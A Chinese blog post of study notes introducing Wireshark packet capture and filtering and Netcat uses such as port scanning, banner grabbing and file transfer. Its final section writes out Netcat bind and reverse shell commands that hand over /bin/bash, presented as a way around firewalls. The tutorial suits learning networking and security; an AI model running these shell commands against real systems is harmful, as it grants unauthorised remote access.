Wireshark、Netcat

Wireshark

Wireshark是一个网络数据包分析软件,功能是截取网络数据包,并尽可能显示出最为详细的网络数据包数据。为了安全考虑,wireshark只能查看封包,而不能修改封包的内容,或者发送封包。

界面

抓包获取

点击捕获->设置,设置混杂模式,选中需要监听的接口,点击“开始”,开始捕获数据:

过滤

  • 捕捉过滤器是数据经过的第一层过滤器,它用于控制捕捉数据的数量,以避免产生过大的日志文件。捕捉过滤器必须在开始捕捉前设置完毕
  • 显示过滤器是一种更为强大(复杂)的过滤器。可以在日志文件中迅速准确地找到所需要的记录,、但是不会把数据删除。如果想恢复原状,只要把过滤条件删除即可

二者语法异同点详见:wireshark的显示过滤器和捕捉过滤器

点击捕获->捕获过滤器,进行捕获设置(可以自己添加删除)。常用过滤包括IP过滤(如:ip.addr == x.x.x.x,ip.src == x.x.x.x,ip.dst == x.x.x.x)、协议过滤(如:HTTP、HTTPS、SMTP、ARP等)、端口过滤(如:tcp.port == 21、udp.port == 53)、组合过滤(如:ip.addr == x.x.x.x && tcp.port == 21、tcp.port== 21 or udp.port==53)。

显示过滤器在如下所示位置:

着色规则

在数据包列表区域会看到不同的颜色。wireshark可以让你指定条件,把符合条件的数据包按指定的颜色显示。
点击视图->着色规则,弹出设置颜色规则设置对话框:

封包详细信息

各行信息分别为

  • Frame:物理层的数据帧概况
  • Ethernet II:数据链路层以太网帧头部信息
  • Internet Protocol Version 4:互联网层IP包头部信息
  • Transmission Control Protocol:传输层T的数据段头部信息
  • Hypertext Transfer Protocol:应用层的信息

ip统计

点击统计->对话,就可以统计出所在数据包中所有通信IP地址,包括IPV4和IPV6。

协议统计

点击统计->协议分级,就可以统计出所在数据包中所含的IP协议、应用层协议:

Follow TCP Stream

对于TCP协议,可提取一次会话的TCP流进行分析。点击某帧TCP数据,右键选择追踪流->TCP流:

可以看到这个窗口中的文字会有两种颜色。其中红色用于表示从源地址到目标地址的流量。最开始的红色部分是一个GET请求。蓝色部分是和红色部分相反的方向,也就是从目标地址到源地址的流量。蓝色部分的第一行是“HTTP/1.1 200 OK”,是来自服务器的一个http成功响应。

在这个窗口中除了能够看到这些原始数据,还可以在文本间进行搜索,将其保存成一个文件、打印,或者以ASCII码、EBCDIC、十六进制或者C数组的格式去查看。

HTTP头部分析

对于HTTP协议,WireShark可以提取其URL地址信息。

点击统计->HTTP->分组计数器,就可以统计出HTTP会话中请求、应答包数量:

点击统计->HTTP->请求,就可以统计出HTTP会话中Request的域名,包括子域名:

点击统计->HTTP->负载分配,就可以统计出HTTP会话的IP、域名分布情况,包括返回值:

这只是Wireshark最基础的功能,用WireShark分析攻击行为才是重中之重,后期将进行深入学习,详见WireShark教程 - 黑客发现之旅

Netcat

netcat是网络工具中的瑞士军刀,它能通过TCP和UDP在网络中读写数据。netcat所做的就是在两台电脑之间建立链接并返回两个数据流。

端口扫描

打印21到25所有开放的端口:

可以运行在TCP或者UDP模式,默认是TCP,-u参数调整为udp.
-z: 告诉netcat使用0 IO,连接成功后立即关闭连接,不进行数据交换
-v: 详细输出
-n: 不使用DNS解析

小Tips:一般如果后面是跟ip的话,就带上-n参数;跟着是域名的话,就不带-n参数。

一旦发现开放的端口,可以使用netcat 连接服务抓取他们的banner:

banner是一个文本,banner是一个连接的服务发送回来的文本信息。当试图鉴别漏洞或者服务的类型和版本的时候,banner信息是非常有用的。但并不是所有的服务都会发送 banner。

聊天服务

服务器:

nc -l -p 20000  

-l:指明netcat处于监听模式,   
-p:指定源端口号

客户机:

nc -n 10.43.42.5 20000  

netcat在服务器的20000端口启动了一个tcp服务器,所有的标准输出和输入会输出到该端口。输出和输入都在此shell中展示。

文件传输

FTP,SCP,SMB都可以传输文件,但是只是需要临时或者一次传输文件,不值得安装配置一个软件到机器上。现有机器A 192.168.199.139,机器B 192.168.199.161,A向B传输文件:

服务器(A):

$nc -l -p 20000 < 1.txt

客户机(B):

$nc -n 192.168.199.139 > 1.txt

在A上创建了一个服务器并且重定向netcat的输入为文件1.txt,当任何成功连接到该端口,netcat会发送1.txt的文件内容。

同样也可以让A作为客户端,B作为服务器。

Server B:

nc -l -p 20000 > 1.txt  

Client A:

nc -n 192.168.199.161 20000 < 1.txt  

目录传输

如果想要发送多个文件或者整个目录,只需要使用压缩工具tar,压缩后发送压缩包。

服务器:

tar -cvf - ./test/ | nc -l -p 20000    创建一个tar归档包并且通过-在控制台重定向它

客户机:

nc -n 192.168.199.139 20000 | tar -xvf -

正向shell

现要在A机器上打开B机器的shell,应把A当成Client,把B当成Server,在B上监听输入的连接,等A连入后就可操作B的shell:

服务器:

nc -l -p 20000 -e /bin/bash 表示当连接成功时执行/bin/bash

客户机:

nc -n 192.168.199.161 20000 

反向shell

使用正向shell时,如果防火墙屏蔽了输入,只允许输出,那么这时候就是反向shell发挥作用的时候了。

反向shell的做法是把A当成netcat的Server,把B当成netcat的Client,然后在A上用-l参数监听netcat的链接。

服务器:

nc -l -p 20000  

客户机:

nc -n 192.168.199.139 20000 -e /bin/bash  

然后在A上执行shell命令,就可以相当于B的远程shell了:

反向shell经常被用来绕过防火墙的限制,如阻止入站连接。例如有一个专用IP地址为192.168.199.139,使用代理服务器连接到外部网络。如果想从网络外部访问这台机器shell,那么就会用反向外壳用于这一目的。

更多详见:Linux Netcat 命令——网络工具中的瑞士军刀

posted @ 2018-03-18 10:41  20179202杨晓桐  阅读(1107)  评论(0编辑  收藏  举报